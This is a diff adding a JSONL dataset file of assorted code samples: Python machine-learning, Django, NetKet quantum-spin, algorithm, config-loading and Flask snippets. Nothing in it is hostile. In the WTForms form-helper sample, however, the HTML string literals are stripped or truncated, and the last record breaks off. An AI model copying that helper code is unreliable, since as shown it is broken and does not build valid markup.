diff --git "a/3526.jsonl" "b/3526.jsonl"
new file mode 100644
--- /dev/null
+++ "b/3526.jsonl"
@@ -0,0 +1,688 @@
+{"seq_id":"383308904","text":"import h5py\nimport os\nimport numpy as np\nimport json\nfrom other.config import BATCH_SIZE\nimport json\nfrom collections import defaultdict\n# import tensorflow as tf\n\ndef read_hdf5(hdf5_path, ann_path, is_debug):\n h = h5py.File(hdf5_path)\n c = read_captions(ann_path)\n # ann_list = os.listdir(ann_path)\n # ann_ids = []\n # [ann_ids.append(int(id[15:-4])) for id in ann_list]\n\n\n names = []\n embeddings = [] # 每个image有5条embedding\n captions = []\n\n h_items = h.items()\n cnt = 0\n total = BATCH_SIZE if is_debug else len(h_items)\n for hh in h_items:\n # id = int(hh[0][15:-4])\n # if ann_ids.count(id)<1:\n # continue\n names.append(hh[0])\n embeddings.append(np.array(hh[1])[0:5]) # 注意!有一个图片对应了6个caption,导致封装np.array的时候出错!\n captions.append(c[hh[0]][0:5])\n cnt+=1\n if cnt>=total:\n print('read_hdf5 finished. Total: %d'%cnt)\n break\n return names, np.array(embeddings), captions\n\n# JSON_PATH = \"/data/bo718.wang/+zhaowei/data/516data/mscoco/annotations/captions_train2014.json\"\n# SEG_PATH = \"/data/bo718.wang/zhaowei/data/516data/mscoco/train2014/mask\"\n# IMG_PATH = \"/data/bo718.wang/zhaowei/data/516data/mscoco/train2014/train2014\"\n# HDF5_PATH = \"/data/rui.wu/CZHH/Dataset_COCO/COCO_VSE_torch/COCO_vse_torch_train.hdf5\"\n\n# read_hdf5(HDF5_PATH,JSON_PATH,True)\n\n\ndef read_captions(json_path):\n image_captions = defaultdict(list)\n with open(json_path) as f:\n ic_data = json.load(f)\n for idx in range (0, len(ic_data['annotations'])):\n img_path = 'COCO_%s2014_%.12d.jpg'%('train', ic_data['annotations'][idx]['image_id'])\n image_captions[img_path].append(ic_data['annotations'][idx]['caption'])\n\n return image_captions","sub_path":"data_input/read_hdf5.py","file_name":"read_hdf5.py","file_ext":"py","file_size_in_byte":1818,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"501851626","text":"import re\r\n\r\nfrom django.contrib.auth import get_user_model\r\nfrom django.core.exceptions import ValidationError\r\nfrom django.utils.translation import ugettext_lazy as _\r\n\r\nUser = get_user_model()\r\n\r\n\r\ndef validate_unique_user(error_message, **criteria):\r\n existent_user = User.objects.filter(**criteria).exists()\r\n if existent_user:\r\n raise ValidationError(error_message)\r\n\r\n\r\ndef validate_username_chars(username):\r\n if not username.isalnum():\r\n raise ValidationError(\r\n _('Username \"%(username)s\" cannot contain invalid characters'),\r\n code='invalid_chars_username',\r\n params={'username': username},\r\n )\r\n\r\ndef validate_phone_number(phone_number):\r\n match_pattern = re.match(r'^\\+?\\d{9,15}$', phone_number)\r\n if not match_pattern:\r\n raise ValidationError(\r\n _('Invalid phone number'),\r\n code='invalid_phone_number',\r\n )","sub_path":"src/sleekapps/users/validators.py","file_name":"validators.py","file_ext":"py","file_size_in_byte":928,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"550784429","text":"from wtforms.fields.core import UnboundField\n\n\nclass FormHelperBS3(object):\n\n def render_field(self, field, **kwargs):\n # begin the frag\n frag = \"\"\n\n # deal with the first error if it is relevant\n first_error = kwargs.pop(\"first_error\", False)\n if first_error:\n frag += ''\n\n # call the correct render function on the field type\n if field.type == \"FormField\":\n frag += self._form_field(field, **kwargs)\n elif field.type == \"FieldList\":\n frag += self._field_list(field, **kwargs)\n else:\n frag += self._wrap_control_group(field, self._render_field(field, **kwargs), **kwargs)\n\n return frag\n\n def _wrap_control_group(self, field, contents, **kwargs):\n hidden = kwargs.pop(\"hidden\", False)\n container_class = kwargs.pop(\"container_class\", None)\n disabled = kwargs.pop(\"disabled\", False)\n render_subfields_horizontal = kwargs.pop(\"render_subfields_horizontal\", False)\n complete_me = kwargs.get(\"complete_me\", False)\n\n frag = '
\"\n if contents is not None:\n frag += contents\n frag += \"
\"\n\n return frag\n\n def _form_field(self, field, **kwargs):\n # get the useful kwargs\n render_subfields_horizontal = kwargs.pop(\"render_subfields_horizontal\", False)\n\n frag = \"\"\n # for each subfield, do the render\n for subfield in field:\n if render_subfields_horizontal and not (subfield.type == 'CSRFTokenField' and not subfield.value):\n subfield_width = \"3\"\n remove = []\n for kwarg, val in kwargs.items():\n if kwarg == 'subfield_display-' + subfield.short_name:\n subfield_width = val\n remove.append(kwarg)\n for rm in remove:\n del kwargs[rm]\n frag += '
\"\n else:\n frag += self._render_field(subfield, **kwargs)\n\n return self._wrap_control_group(field, frag, **kwargs)\n\n def _field_list(self, field, **kwargs):\n # for each subfield, do the render\n frag = \"\"\n for subfield in field:\n if subfield.type == \"FormField\":\n frag += self.render_field(subfield, **kwargs)\n else:\n frag = self._wrap_control_group(field, self._render_field(field, **kwargs), **kwargs)\n return frag\n\n def _render_field(self, field, **kwargs):\n # interesting arguments from keywords\n extra_input_fields = kwargs.get(\"extra_input_fields\")\n q_num = kwargs.pop(\"q_num\", None)\n maximise_width = kwargs.pop(\"maximise_width\", False)\n clazz = kwargs.get(\"class\", \"\")\n label_width = kwargs.get(\"label_width\", 3)\n field_width = 12 - label_width\n field_width = str(kwargs.get(\"field_width\", field_width))\n if label_width > 0:\n label_width = str(label_width)\n\n if field.type == 'CSRFTokenField' and not field.value:\n return \"\"\n\n frag = \"\"\n\n # If this is the kind of field that requires a label, give it one\n if field.type not in ['SubmitField', 'HiddenField', 'CSRFTokenField']:\n if q_num is not None:\n frag += ''\n if label_width != 0:\n frag += '\"\n\n # determine if this is a checkbox\n is_checkbox = False\n if (field.type == \"SelectMultipleField\"\n and field.option_widget.__class__.__name__ == 'CheckboxInput'\n and field.widget.__class__.__name__ == 'ListWidget'):\n is_checkbox = True\n\n extra_class = \"\"\n if is_checkbox:\n extra_class += \" checkboxes\"\n\n frag += '
'\n if field.type == \"RadioField\":\n for subfield in field:\n frag += self._render_radio(subfield, **kwargs)\n elif is_checkbox:\n frag += '
'\n for subfield in field:\n frag += self._render_checkbox(subfield, **kwargs)\n frag += \"
\"\n else:\n if maximise_width:\n clazz += \" col-xs-12\"\n kwargs[\"class\"] = clazz\n render_args = {}\n # filter anything that shouldn't go in as a field attribute\n for k, v in kwargs.items():\n if k in [\"class\", \"style\", \"disabled\"] or k.startswith(\"data-\"):\n render_args[k] = v\n frag += field(**render_args) # FIXME: this is probably going to do some weird stuff\n\n # FIXME: field.value isn't always set\n #if field.value in extra_input_fields.keys():\n # extra_input_fields[field.value](**{\"class\" : \"extra_input_field\"})\n\n if field.errors:\n frag += '
\"\n frag += field(**kwargs)\n frag += ''\n\n if field.label.text in list(extra_input_fields.keys()):\n eif = extra_input_fields[field.label.text]\n if not isinstance(eif, UnboundField):\n frag += \" \" + extra_input_fields[field.label.text](**{\"class\" : \"extra_input_field\"})\n\n frag += \"
\"\n return frag\n","sub_path":"portality/formcontext/formhelper.py","file_name":"formhelper.py","file_ext":"py","file_size_in_byte":7937,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"487727362","text":"n,c = map(int,input().split())\na = []\nfor _ in range(n):\n a.append(int(input()))\na.sort()\nleft = 0\nright = a[-1] - a[0]\nans = -1\nwhile left<=right:\n x = (left+right)//2\n cnt = 1\n cur = 0\n for i in range(1,n):\n if a[i] - a[cur] >= x:\n cnt+=1\n cur = i\n if cnt >=c:\n ans = x\n left = x+1\n else:\n right = x-1\nprint(ans)\n\n","sub_path":"Silver1/공유기 설치.py","file_name":"공유기 설치.py","file_ext":"py","file_size_in_byte":387,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"49491361","text":"import multiprocessing as mp\nimport json\nimport os\nfrom qutip import *\nimport numpy as np\nimport scipy\nimport matplotlib.pyplot as plt\nplt.style.use('seaborn')\nfrom matplotlib import gridspec\nimport itertools\nfrom numpy.random import seed\nfrom scipy import optimize\nfrom functools import wraps\nimport time\nimport netket as nk\nfrom netket.operator import local_values as _local_values\nfrom netket._core import deprecated\nfrom netket.stats import (\n statistics as _statistics,\n mean as _mean,\n)\nimport copy\nimport pickle\nfrom pickle import load, dump\nimport collections\nfrom collections import OrderedDict\n\n\n# Wrapper to time functions\ndef timing(f):\n @wraps(f)\n def wrap(*args, **kw):\n ti = time.time()\n result = f(*args, **kw)\n tf = time.time()\n t = tf - ti\n return result, t\n\n return wrap\n\n# Make basis and get sz values\ndef operatorCreation(N):\n # operator definitionis\n si = qeye(2)\n sx = 0.5 * sigmax()\n sy = 0.5 * sigmay()\n sz = 0.5 * sigmaz()\n sx_list = []\n sy_list = []\n sz_list = []\n for n in range(N):\n op_list = []\n for m in range(N):\n op_list.append(si)\n op_list[n] = sx\n sx_list.append(tensor(op_list))\n op_list[n] = sy\n sy_list.append(tensor(op_list))\n op_list[n] = sz\n sz_list.append(tensor(op_list))\n op_list[n] = si\n id = tensor(op_list)\n return sx_list, sy_list, sz_list, id\n\n# Construct Hamiltonian\ndef hamiltonian(N, B, A0):\n sx_list = operatorCreation(N)[0]\n sy_list = operatorCreation(N)[1]\n sz_list = operatorCreation(N)[2]\n H = B * sz_list[0]\n for n in range(N - 1):\n H += A0 * sz_list[0] * sz_list[n + 1] + A0 * sx_list[0] * sx_list[n + 1] + A0 * sy_list[0] * sy_list[n + 1]\n return H\n\n# Get Ground State Energy and Wavefuntion\nclass GroundState:\n def __init__(self, N, B, A0):\n self.hamiltonian = hamiltonian(N, B, A0)\n @timing\n def __call__(self):\n # find ground state\n H = self.hamiltonian\n groundState = H.groundstate()\n return groundState[0], groundState[1]\n\n# Make basis and get sz values\ndef basisCreation(N):\n sz_list = operatorCreation(N)[2]\n Sbasis = []\n basisState = []\n for j in range(2):\n basisState.append(basis(2, j))\n b = itertools.product(basisState, repeat=N)\n basisTensor = list(b)\n # makes Sbasis the correct dimesion of Qobj\n for i in range(2 ** N):\n c = basisTensor[i][0]\n for j in range(N - 1):\n c = tensor(c, basisTensor[i][j + 1])\n Sbasis.append(c)\n # get sz values for basis states\n sz = np.zeros((2 ** N, N), dtype=complex)\n a = [[1 for j in range(N)] for i in range(2 ** N)]\n for i in range(2 ** N):\n for j in range(N):\n # matrix element \n sz[i][j] = sz_list[j].matrix_element(Sbasis[i], Sbasis[i])\n return Sbasis, sz\n\n# get randomized RBM parameters (between zero and 1)\ndef ranRBMpar(N, M):\n np.random.seed(int.from_bytes(os.urandom(4), byteorder='little'))\n par = 1 - 2 * np.random.rand(2 * (N + M + N * M))\n return par\n\n# Function to give RBM wavefuntion\ndef RBM_ansatz(par, N, M,basis):\n Sbasis = basis[0]\n sz = basis[1]\n # make parmeters complex\n num = N + M + N * M\n parC = np.vectorize(complex)(par[:num], par[num:])\n a = parC[:N]\n b = parC[N:N + M]\n W = parC[N + M:].reshape(M, N)\n expTerm = np.zeros(2 ** N, dtype=complex)\n coshTerm = np.zeros((M, 2 ** N), dtype=complex)\n psiMValues = np.zeros(2 ** N, dtype=complex)\n psiM = 0 * Sbasis[0]\n\n for i in range(2 ** N):\n for m in range(M):\n coshTerm[m][i] = 2 * np.cosh(np.dot(W[m], sz[i]) + b[m])\n hidProduct = np.prod(coshTerm, axis=0)\n\n for i in range(2 ** N):\n expTerm[i] = 
np.exp(np.dot(a, sz[i]))\n psiMValues[i] = expTerm[i] * hidProduct[i]\n psiM += psiMValues[i] * Sbasis[i]\n psiNorm = psiM.unit()\n return psiNorm\n\n# Error Calculation\ndef err(found_gs, gs, found_gsEnergy, gsEnergy):\n engErr = np.abs(found_gsEnergy - gsEnergy)\n waveFunctionErr = found_gs.dag() * gs\n waveFunctionErr = 1 - waveFunctionErr.norm()\n return engErr, waveFunctionErr\n\n\n# **** NetKet RBM ****\n\n#Central Spin Hamiltonian and Hilbert space defined in NetKet objects\ndef hamiltonianNetKet(N, B, A):\n # Make graph with no edges of length N\n #g = nk.graph.Edgeless(N)\n g = nk.graph.Hypercube(length=N, n_dim=1, pbc=False)\n # Spin based Hilbert Space\n hi = nk.hilbert.Spin(s=0.5, graph=g)\n # Define sigma matrices\n sigmaz = -0.5 * np.array([[1, 0], [0, -1]])\n sigmax = 0.5 * np.array([[0, 1], [1, 0]])\n sigmay = -0.5 * np.array([[0, -1j], [1j, 0]])\n operators = []\n sites = []\n\n # Central spin term\n operators.append((B * sigmaz).tolist())\n sites.append([0])\n # Iteraction term\n itOp = np.kron(sigmaz, sigmaz) + np.kron(sigmax, sigmax) + np.kron(sigmay, sigmay)\n for i in range(N - 1):\n operators.append((A * itOp).tolist())\n sites.append([0, (i+1)])\n\n print('sites: ', sites)\n print('operators: ', operators)\n ha = nk.operator.LocalOperator(hi, operators=operators, acting_on=sites)\n res = nk.exact.lanczos_ed(ha, first_n=1, compute_eigenvectors=False)\n print(\"NetLEt ground state energy = {0:.3f}\".format(res.eigenvalues[0]))\n #Returns Hamiltonian and Hilbert space\n return ha, hi\n\n# Sampler\ndef samplingNetKet(n_samples, sampler, hamiltonian):\n n_discard = 0.1*n_samples\n batch_size = sampler.sample_shape[0]\n print(batch_size)\n n_samples_chain = int(np.ceil((n_samples / batch_size)))\n n_samples_node = int(np.ceil(n_samples_chain / nk.MPI.size()))\n # Burnout phase\n for _ in sampler.samples(n_discard):\n pass\n sam = np.ndarray((n_samples_node, batch_size, hamiltonian.hilbert.size))\n # Generate samples and store them\n for i, sample in enumerate(sampler.samples(n_samples_node)):\n sam[i] = sample\n return sam\n\n\n# Calculates Local energy of samples\ndef energyLocalNetKet(par, N, M, H, basis, v):\n v = v.dag()\n psiM = RBM_ansatz(par, N, M, basis)\n E = v*H*psiM\n norm = v.overlap(psiM)\n Enorm = E/norm\n return Enorm.full()[0][0]\n\n# Exact Digonalization NetKet\ndef exactDigonalization(ha):\n haMatrix = ha.to_dense()\n e, v = np.linalg.eigh(haMatrix)\n inds = np.argsort(e)\n e = e[inds]\n v = v[:, inds]\n return e, v\n\n# Define Netket RBM\nclass NetKetRBM:\n def __init__(self,N,ha,hi,alpha, ma):\n self.ha,self.hi, self.ma = ha, hi, ma\n self.N = N\n # Define sampler\n self.sa = nk.sampler.MetropolisLocal(machine=self.ma)\n # Optimizer\n self.op = nk.optimizer.Sgd(learning_rate=0.05)\n\n def __call__(self,basis):\n gs = nk.Vmc(\n hamiltonian=self.ha,\n sampler=self.sa,\n optimizer=self.op,\n n_samples=1000,\n n_discard=None,\n sr=None,\n )\n start = time.time()\n gs.run(output_prefix='RBM', n_iter=600)\n end = time.time()\n runTime = end-start\n # import the data from log file\n data = json.load(open(\"../RBM.log\"))\n # Extract the relevant information\n iters = []\n energy_RBM = []\n\n for iteration in data[\"Output\"]:\n iters.append(iteration[\"Iteration\"])\n engTemp = iteration[\"Energy\"][\"Mean\"]\n energy_RBM.append(engTemp)\n finalEng = energy_RBM[-1]\n # Create GS Vector\n maArray = self.ma.to_array()\n finalState = maArray[3] * basis[0][0] + maArray[2] * basis[0][1] + maArray[1] * basis[0][2] + maArray[0]*basis[0][3]\n return finalEng, 
finalState, runTime\n\nclass NetKetSR:\n def __init__(self, N, ha, hi, alpha, ma):\n self.ha, self.hi, self.ma = ha, hi, ma\n self.N = N\n # Define sampler\n self.sa = nk.sampler.MetropolisLocal(machine=self.ma)\n # Optimizer\n self.op = nk.optimizer.Sgd(learning_rate=0.05)\n\n def __call__(self, basis):\n gs = nk.variational.Vmc(hamiltonian=self.ha,\n sampler=self.sa,\n optimizer=self.op,\n n_samples=1000,\n use_iterative=True,\n method='Sr')\n start = time.time()\n gs.run(output_prefix='RBM', n_iter=600)\n end = time.time()\n runTime = end - start\n # import the data from log file\n data = json.load(open(\"../RBM.log\"))\n # Extract the relevant information\n iters = []\n energy_RBM = []\n\n for iteration in data[\"Output\"]:\n iters.append(iteration[\"Iteration\"])\n engTemp = iteration[\"Energy\"][\"Mean\"]\n energy_RBM.append(engTemp)\n finalEng = energy_RBM[-1]\n # Create GS Vector\n maArray = self.ma.to_array()\n finalState = 0\n for i in range(2 ** self.N):\n finalState += maArray[2 ** self.N - i - 1] * basis[0][i]\n return finalEng, finalState, runTime\n\n# Change RBM parameters to netKet RBM paramters, and loads machine\ndef covertParams(N,M,par, ma):\n # Change to a,b,w\n num = N + M + N * M\n parC = np.vectorize(complex)(par[:num], par[num:])\n a = parC[:N]\n a = [0.5 * x for x in a]\n b = parC[N:N + M]\n w = parC[N + M:].reshape(M, N)\n w = [0.5 * x for x in w]\n w = np.array(w).T\n rbmOrderedDict = OrderedDict([('a', a), ('b', b), ('w', w)])\n # Save parameters so they can be loaded into the netket machine\n with open(\"../../../Data/07-28-20/paramsGS.json\", \"wb\") as output:\n dump(rbmOrderedDict, output)\n # Load into ma\n ma.load(\"Data/07-28-20/paramsGS.json\")\n\n\n\n# Hamiltionian Parameters\nB=1\nA=1\nN = 2\n# RBM Parameters\n# ALPHA NEEDS TO BE AN INTEGER!!!\nalpha = 1\nM = alpha*N\nbasis = basisCreation(N)\n\nH = hamiltonian(N,B,A)\n\n# ** NETKET OBJECTS ***\nha,hi = hamiltonianNetKet(N, B, A)\n# Define machine\nma = nk.machine.RbmSpin(alpha = alpha, hilbert=hi, use_visible_bias = True, use_hidden_bias = True)\n# Define sampler\nsa = nk.sampler.MetropolisLocal(machine=ma, n_chains=20)\n\n# Exact Diagonalization\ngroundState = GroundState(N, B, A)\ned = groundState()\nedEng = ed[0][0]\nedState = ed[0][1]\nprint('Ground State: ', edState)\n\n# # Histogram All\nhisIt = np.arange(1)\nengErrNK = []\nstateErrNK = []\nrunTimeNK = []\nengErrSR = []\nstateErrSR = []\nrunTimeSR = []\nparams = []\n\n\nfor i in range(len(hisIt)):\n # Create RBM Parameters\n randomParams = ranRBMpar(N, M)\n print(randomParams)\n params.append(randomParams.tolist())\n # Update NetKet machine with randomParams\n covertParams(N, M, randomParams, ma)\n maArray = ma.to_array()\n finalState = 0\n for i in range(2 ** N):\n finalState += maArray[2 ** N - i - 1] * basis[0][i]\n\n # NK Run\n rbmNK = NetKetRBM(N, ha, hi, alpha, ma)\n engNKTemp, stateNKTemp, runTimeNKTemp = rbmNK(basis)\n print('NK State ', stateNKTemp)\n E = expect(H, stateNKTemp)\n norm = stateNKTemp.norm() ** 2\n Enorm = E / norm\n print('NK Energy From State ', Enorm )\n print('NK Energy', engNKTemp)\n runTimeNK.append(runTimeNKTemp)\n errNK = err(stateNKTemp, edState, engNKTemp, edEng)\n engErrNK.append(errNK[0])\n stateErrNK.append(errNK[1])\n\n # NK Run\n rbmSR = NetKetSR(N, ha, hi, alpha, ma)\n engSRTemp, stateSRTemp, runTimeSRTemp = rbmSR(basis)\n runTimeSR.append(runTimeSRTemp)\n errSR = err(stateSRTemp, edState, engSRTemp, edEng)\n engErrSR.append(errSR[0])\n stateErrSR.append(errSR[1])\n\n\n# Save data to JSON file\ndata = 
[engErrNK,engErrSR, stateErrNK, stateErrSR, runTimeNK,runTimeSR]\nfileName = \"Data/07-28-20/NetKetN\"+str(N)+\"M\" + str(M)+\"B\"+str(B)+\".json\"\nopen(fileName, \"w\").close()\nwith open(fileName, 'a') as file:\n for item in data:\n line = json.dumps(item)\n file.write(line + '\\n')\n\n# Save RBM Paramarers data to JSON file\ndata = params\nfileName = \"Data/07-28-20/ParamsN\"+str(N)+\"M\" + str(M)+\"B\"+str(B)+\".json\"\nopen(fileName, \"w\").close()\nwith open(fileName, 'a') as file:\n for item in data:\n line = json.dumps(item)\n file.write(line + '\\n')\n\n# Plotting\nallEngErr = [engErrNK,engErrSR]\nallStateErr = [stateErrNK,stateErrSR]\nallRunTime = [ runTimeNK, runTimeSR]\nlabels = ['Gradient Descent','Stochastic Reconfiguration']\ncolors = ['blue', 'green']\n\nhisIt= np.arange(len(engErrNK))\n#plt.figure(constrained_layout=True)\nplt.figure(figsize=(10,10))\nttl = plt.suptitle(\"Comparison of NetKet and Non-NetKet RBM \\n N = \" + str(N)+\", B = \"+str(B)+\", M = \" + str(M),size =20)\ngs = gridspec.GridSpec(ncols=3, nrows=3, hspace = 0.4)\nttl.set_position([.5, 0.94])\n\nax1 = plt.subplot(gs[0, 0])\nax1.hist(allEngErr, bins=10, color = colors, label=labels)\nax1.set_xlabel(\"$\\Delta E = |E_{RBM}-E_{ED}|$\",size = 15)\n\nax2 = plt.subplot(gs[0, 1])\nax2.hist(allStateErr, bins=10, color = colors, label=labels)\nax2.set_xlabel(\"$1-|<\\Psi_{RBM}|\\Psi_{ED}>|^2$\",size = 15)\n\nax3 = plt.subplot(gs[0, 2])\nax3.hist(allRunTime, bins=10, color = colors)\nax3.set_xlabel(\"Runtime (s)\",size = 15)\n\nax4 = plt.subplot(gs[1, :])\nax4.scatter(hisIt,engErrNK, color = 'blue')\nax4.scatter(hisIt,engErrSR, color = 'green',marker = '>')\nax4 .set_ylabel(\"$\\Delta E = |E_{RBM}-E_{ED}|$\", size = 15)\n\nax1.legend(labels, loc = (0, -3.3),fontsize = 12,ncol=3)\n\nax5 = plt.subplot(gs[2, :])\nax5.scatter(hisIt,runTimeNK, color = 'blue')\nax5.scatter(hisIt,runTimeSR, color = 'green',marker = '>')\nax5.set_xlabel(\"Run Number\",size = 15)\nax5 .set_ylabel(\"Runtime (s)\", size = 15)\nplt.show()\n\n\n# PLOT ONE RUN\n#\n#\n# # Create RBM Parameters\n# randomParams = ranRBMpar(N, M)\n# # Update NetKet machine with randomParams\n# covertParams(N, M, randomParams, ma)\n#\n# # Exact Diagonalization\n# groundState = GroundState(N, B, A)\n# ed = groundState()\n# edEng = ed[0][0]\n# edState = ed[0][1]\n#\n#\n# # NetKet Run\n# rbmNK = NetKetRBM(N, ha, hi, alpha, ma)\n# engNK, stateNK, runTimeNK= rbmNK(basis)\n# print('Eng, State, Runtime ', engNK, stateNK, runTimeNK)\n# errNK = err(stateNK,edState,engNK,edEng)\n# print('eng error: ', errNK[0])\n# print('state error: ', errNK[1])\n#\n#\n# # Get iteration information\n# data = json.load(open(\"RBM.log\"))\n# iters = []\n# energy_RBM = []\n# for iteration in data[\"Output\"]:\n# iters.append(iteration[\"Iteration\"])\n# engTemp = iteration[\"Energy\"][\"Mean\"]\n# energy_RBM.append(engTemp)\n#\n# # Plot Iteration\n# fig, ax1 = plt.subplots()\n# plt.title('NetKet Central Spin Iteration N = 3, M = 3, B = 1, A = 1 ', size=20)\n# ax1.plot(iters, energy_RBM - exact_gs_energy, color='red', label='Energy (RBM)')\n# ax1.set_ylabel('Energy Error')\n# #ax1.set_ylim(0,1.5)\n# ax1.set_xlabel('Iteration')\n# #plt.axis([0,iters[-1],exact_gs_energy-0.03,exact_gs_energy+0.2])\n# plt.show()","sub_path":"Deprecated/NetKet2/NetKet_Testing/NetKetScaling.py","file_name":"NetKetScaling.py","file_ext":"py","file_size_in_byte":14760,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"40476791","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('administracion', '0001_initial'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='Localidad',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('nombre', models.CharField(max_length=200)),\n ],\n options={\n },\n bases=(models.Model,),\n ),\n migrations.AddField(\n model_name='cliente',\n name='contacto',\n field=models.CharField(max_length=200, null=True),\n preserve_default=True,\n ),\n migrations.AddField(\n model_name='cliente',\n name='contacto_a',\n field=models.CharField(max_length=200, null=True),\n preserve_default=True,\n ),\n migrations.AddField(\n model_name='cliente',\n name='direccion',\n field=models.CharField(max_length=200, null=True),\n preserve_default=True,\n ),\n migrations.AddField(\n model_name='cliente',\n name='localidad',\n field=models.ForeignKey(to='administracion.Localidad', null=True),\n preserve_default=True,\n ),\n migrations.AddField(\n model_name='cliente',\n name='telefono',\n field=models.CharField(max_length=20, null=True),\n preserve_default=True,\n ),\n migrations.AddField(\n model_name='cliente',\n name='telefono_a',\n field=models.CharField(max_length=20, null=True),\n preserve_default=True,\n ),\n ]\n","sub_path":"administracion/migrations/0002_auto_20140917_1322.py","file_name":"0002_auto_20140917_1322.py","file_ext":"py","file_size_in_byte":1829,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"162261635","text":"\"\"\"\nExample\nGiven a binary search tree:\n\n 4\n / \\\n 2 5\n / \\\n1 3\nreturn 1<->2<->3<->4<->5\n\"\"\"\n\"\"\"\nDefinition of Doubly-ListNode\nclass DoublyListNode(object):\n def __init__(self, val, next=None):\n self.val = val\n self.next = self.prev = nextDefinition of TreeNode:\nclass TreeNode:\n def __init__(self, val):\n self.val = val\n self.left, self.right = None, None\n\"\"\"\n\nclass Solution:\n \"\"\"\n @param root: The root of tree\n @return: the head of doubly list node\n \"\"\"\n def bstToDoublyList(self, root):\n # write your code here\n dfs = []\n self.inorder(root, dfs)\n if len(dfs) == 0:\n return None\n\n head = None\n prev = None\n for val in dfs:\n node = DoublyListNode(val)\n if head is None:\n head = node\n else:\n prev.next = node\n node.prev = prev\n prev = node\n\n return head\n\n\n # Left middle right\n def inorder(self, root, dfs):\n if root is None:\n return\n self.inorder(root.left, dfs)\n dfs.append(root.val)\n self.inorder(root.right, dfs)\n","sub_path":"daily challenge/7.Convert Binary Search Tree to Doubly Linked List.py","file_name":"7.Convert Binary Search Tree to Doubly Linked List.py","file_ext":"py","file_size_in_byte":1174,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"125211163","text":"'''------------------------------------------------------------------------------------------------\nProgram: config\nVersion: 0.0.4\nPy Ver: 2.7\nPurpose: Small helper program designed to load a program's config\n file.\n\nDependents: os\n sys\n json\n\nDeveloper: J. Berendt\nEmail: support@73rdstreetdevelopment.co.uk\n\nUse: >>> import utils.config\n >>> CONFIG = config.loadconfig()\n\n---------------------------------------------------------------------------------------------------\nUPDATE LOG:\nDate Programmer Version Update\n02.10.16 J. Berendt 0.0.1 Written\n29.11.16 J. Berendt 0.0.2 New loadconfig parameters:\n - filename (default=config.json)\n - devmode (default=False)\n Added docstring to program.\n Added error handling if the config file does not exist.\n Cleaned code to confirm to PEP8. pylint (10/10)\n - WARNING: This will break programs currently using\n this module!\n22.03.17 J. Berendt 0.0.3 Added a test to determine if the filename is a path,\n or filename only. If full path, the devmode / path\n deciphering is bypassed.\n This allows a calling program to pass in a full path to\n the config file, without it being altered.\n14.05.17 J. Berendt 0.0.4 Updated to sit within the utils library.\n Incomplete code warning: added filename parameter to\n the os.path.dirname check.\n Simplified __fromjson function. pylint (10/10)\n Renamed function/method names to replace double leading\n underscore with single underscore.\n------------------------------------------------------------------------------------------------'''\n\nimport os\nimport sys\nimport json\nfrom _version_config import __version__\n\n#-----------------------------------------------------------------------\n#METHOD FOR GENERAL SETUP\ndef loadconfig(filename='config.json', devmode=False):\n\n '''\n DESIGN:\n Function designed to load and return a program's JSON config file\n as a dictionary.\n\n The devmode parameter can be used if you are programming through an\n IDE which defaults the sys.argv[0] value to the cwd of the IDE,\n rather than from where the program is actually being run.\n It just makes design and debugging easier.\n\n PREREQUESITES / ASSUMPTIONS:\n - The config file is a JSON file\n - The config file lives in the program directory\n\n USE:\n > import utils.config as config\n > c = config.loadconfig()\n\n > param_value = c['someparam_name']\n '''\n\n #TEST IF FULL PATH OR ONLY FILENAME WAS PASSED\n if os.path.dirname(filename) == '':\n\n #TEST PROGRAM MODE\n if devmode:\n\n #STORE PROGRAM DIRECTORY\n path_base = os.getcwd()\n\n else:\n\n #ASSIGN DIRECTORIES\n progdir = os.path.dirname(os.path.realpath(sys.argv[0]))\n curdir = os.getcwd()\n\n #TEST AND STORE PROGRAM DIRECTORY\n path_base = progdir if sys.argv[0] != '' else curdir\n\n #CONSOLIDATE PATH AND FILENAME\n fullpath = os.path.join(path_base, filename)\n\n else:\n\n #ASSIGN PASSED PATH/FILENAME TO TESTED VARIABLE\n fullpath = filename\n\n\n #TEST IF THE FILE EXISTS\n if os.path.exists(fullpath):\n\n #LOAD CONFIG FILE\n return _fromjson(filepath=fullpath)\n\n else:\n\n #USER NOTIFICATION\n raise UserWarning('The config file (%s) could not be found.' 
% (fullpath))\n return None\n\n\n#-----------------------------------------------------------------------\n#FUNCTION FOR READING THE CONFIG FILE INTO A DICTIONARY\ndef _fromjson(filepath):\n\n #OPEN AND READ CONFIG FILE >> RETURN AS DICT\n with open(filepath, 'r') as config: return json.load(config)\n","sub_path":"utils/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":4340,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"546397634","text":"from flask import Flask, render_template, request, make_response, send_file, send_from_directory, abort\r\nfrom fpdf import FPDF, HTMLMixin #para el pdf\r\nfrom datetime import date\r\nfrom fpdf import FPDF, HTMLMixin\r\n\r\ndef generadorPeticion():\r\n\r\n modHTML = open(\"./templates/form_peticion.html\",\"w\")\r\n modHTML.write(\r\n \"\"\"\r\n{%extends 'layout.html'%} \r\n{%block content%}\r\n\r\n\r\n\r\n
Si todo está en orden, descarga aquí tu Poder en PDF
